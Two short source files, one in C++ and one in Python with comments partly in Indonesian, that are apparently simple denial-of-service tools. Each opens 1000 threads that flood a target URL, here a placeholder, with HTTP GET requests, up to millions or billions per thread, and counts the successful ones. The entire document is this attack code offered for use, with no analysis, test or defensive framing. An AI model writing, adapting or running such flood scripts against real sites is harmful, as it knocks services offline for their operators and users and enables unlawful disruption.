File: ddos1jt.cpp
#include <httplib.h>
#include <thread>
#include <atomic>

std::atomic<long> success_count(0);

void attack(const std::string &url, int requests_per_thread) {
    httplib::Client client(url);
    for (int i = 0; i < requests_per_thread; i++) {
        if (client.Get("/")) success_count++;
    }
}

int main() {
    std::string target_url = "https://example.com";
    int thread_count = 1000;  // Sesuaikan
    int requests_per_thread = 1000000; // 1 juta/thread

    std::vector<std::thread> threads;
    for (int i = 0; i < thread_count; i++) {
        threads.emplace_back(attack, target_url, requests_per_thread);
    }

    for (auto &t : threads) {
        t.join();
    }

    std::cout << "Total requests: " << success_count << std::endl;
}

File: ddos1jt.py
import requests
import threading
import time
from concurrent.futures import ThreadPoolExecutor

# Shared counter for successful requests
success_count = 0
counter_lock = threading.Lock()

def attack(target_url, requests_per_thread):
    """Send HTTP requests to target URL"""
    global success_count
    local_success = 0
    
    for i in range(requests_per_thread):
        try:
            response = requests.get(target_url)
            if response.status_code == 200:
                local_success += 1
        except:
            pass
    
    # Update global counter with thread-local results
    with counter_lock:
        global success_count
        success_count += local_success

def main():
    target_url = "https://example.com"
    thread_count = 1000  # Adjust as needed
    requests_per_thread = 50000000000  # 50 billion per thread
    
    # Create and start threads
    threads = []
    for i in range(thread_count):
        t = threading.Thread(target=attack, args=(target_url, requests_per_thread))
        threads.append(t)
        t.start()
    
    # Wait for all threads to complete
    for t in threads:
        t.join()
    
    print(f"Total successful requests: {success_count}")

if __name__ == "__main__":
    main()
